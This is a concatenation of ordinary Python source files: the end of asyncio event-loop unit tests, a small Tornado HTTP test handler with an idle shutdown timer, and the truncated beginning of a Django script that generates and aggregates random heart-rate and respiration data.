prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
tornado_handler.py
|
from __future__ import print_function
from ResponseProvider import Payload
from ResponseProvider import ResponseProvider
from ResponseProvider import ResponseProviderMixin
from threading import Timer
import os
import threading
import tornado.ioloop
import tornado.web
import logging
class MainHandler(tornado.web.RequestHandler, ResponseProviderMixin):
ping_count = 1
self_destruct_timer = None
def got_pinged(self):
MainHandler.ping_count += 1
def kill(self):
MainHandler.ping_count -= 1
if MainHandler.ping_count <= 0: #so that if we decrease the value from several threads we still kill it.
MainHandler.suicide()
if MainHandler.self_destruct_timer:
MainHandler.self_destruct_timer.cancel()
def dispatch_response(self, payload):
self.set_status(payload.response_code())
for h in payload.headers():
self.add_header(h, payload.headers()[h])
self.add_header("Content-Length", payload.length())
self.write(payload.message())
def prepare_headers(self):
ret = dict()
for h in self.request.headers:
ret[h.lower()] = self.request.headers.get(h)
return ret
def init_vars(self):
self.response_provider = ResponseProvider(self)
self.headers = self.prepare_headers()
def prepare(self):
MainHandler.reset_self_destruct_timer()
self.init_vars()
def get(self, param):
self.dispatch_response(self.response_provider.response_for_url_and_headers(self.request.uri, self.headers))
def post(self, param):
payload = self.response_provider.response_for_url_and_headers(self.request.uri, self.headers)
if payload.response_code() >= 300:
self.dispatch_response(Payload(self.request.body))
else:
self.dispatch_response(payload)
@staticmethod
def suicide():
tornado.ioloop.IOLoop.current().stop()
logging.info("The server's life has come to an end, pid: {}".format(os.getpid()))
@staticmethod
def reset_self_destruct_timer():
if MainHandler.self_destruct_timer:
logging.debug("Canceling the kill timer")
MainHandler.self_destruct_timer.cancel()
MainHandler.self_destruct_timer = Timer(MainHandler.lifespan, MainHandler.suicide)
logging.debug("Starting the kill timer")
MainHandler.self_destruct_timer.start()
@staticmethod
def start_serving():
thread = threading.Thread(target=tornado.ioloop.IOLoop.current().start)
thread.deamon = True
thread.start()
@staticmethod
def init_server(port, lifespan):
MainHandler.lifespan = lifespan
MainHandler.reset_self_destruct_timer()
application = tornado.web.Application([
(r"/(.*)", MainHandler),
])
application.listen(port)
|
generate_data.py
|
import asyncio
import logging
import os
import random
import time
import threading
from multiprocessing import Pool
from multiprocessing import Process
from activity.constants import ACTIVITY, HEART_RATE, RESPIRATION_RATE, USER_ID
from activity.models import DeviceModel
from activity.utils import generate_csv_file, readable_time
import arrow
from django.conf import settings
from django.db.models import Avg, Max, Min
logging.basicConfig(
level=logging.INFO,
filename=os.path.join(settings.LOG_DIR) + '/activity.log',
format='%(asctime)s - [%(levelname)s] - %(app)s - %(name)s - (%(filename)s).%(funcName)s(%(lineno)d) - %(message)s',
)
logger = logging.getLogger(__name__)
logger = logging.LoggerAdapter(logger, {'app': 'Activity'})
class DeviceData:
def __init__(self):
self.user_qs = DeviceModel.objects.values_list('user_id', flat=True).distinct()
def generate_data(self):
data = {
'user_id': random.choice(USER_ID),
'heart_rate': random.choice(HEART_RATE),
'respiration_rate': random.choice(RESPIRATION_RATE),
'activity': random.choice(ACTIVITY)
}
return data
def insert_to_db(self, limit):
"""
Generating random data and inserting into database
"""
try:
for i in range(limit):
data = self.generate_data()
DeviceModel.objects.create(**data)
time.sleep(1)
except Exception as e:
logger.error('Exception-{}'.format(e))
def process_data(self, limit):
"""generation and insertion of data asynchronously"""
threading.Thread(target=self.insert_to_db, args=(limit,)).start()
return True, {'message': 'Data Generation in process'}
def aggregate_value(self, file_path):
"""
calculating avg, min, max of entire data for each user
"""
try:
result = []
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
queryset = DeviceModel.objects.filter(user_id=user).aggregate(
Avg('heart_rate'), Max('heart_rate'), Min('heart_rate'),
Avg('respiration_rate'), Max('respiration_rate'),
Min('respiration_rate'), Min('timestamp'), Max('timestamp')
)
data = self.format_data(user, queryset)
result.append(data)
generate_csv_file(file_path, result)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
def format_data(self, user, queryset):
"""
formatting data before writing it into csv
"""
data = {
'start_time': readable_time(queryset.get('timestamp__min')),
'end_time': readable_time(queryset.get('timestamp__max')),
'user_id': user,
'avg_hr': queryset.get('heart_rate__avg'),
'max_hr': queryset.get('heart_rate__max'),
'min_hr': queryset.get('heart_rate__min'),
'avg_rr': queryset.get('respiration_rate__avg'),
'max_rr': queryset.get('respiration_rate__max'),
'min_rr': queryset.get('respiration_rate__min')
}
return data
def segment_value(self, file_path):
"""
To calculate hourly avg, min, max, for each user using the entire data
in 15 mins segments
"""
try:
seg_list = []
device_objs = DeviceModel.objects.all()
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
min_ts = device_objs.aggregate(Min('timestamp'))
from_seg = arrow.get(min_ts.get('timestamp__min'))
to_seg = from_seg.shift(minutes=15)
while True:
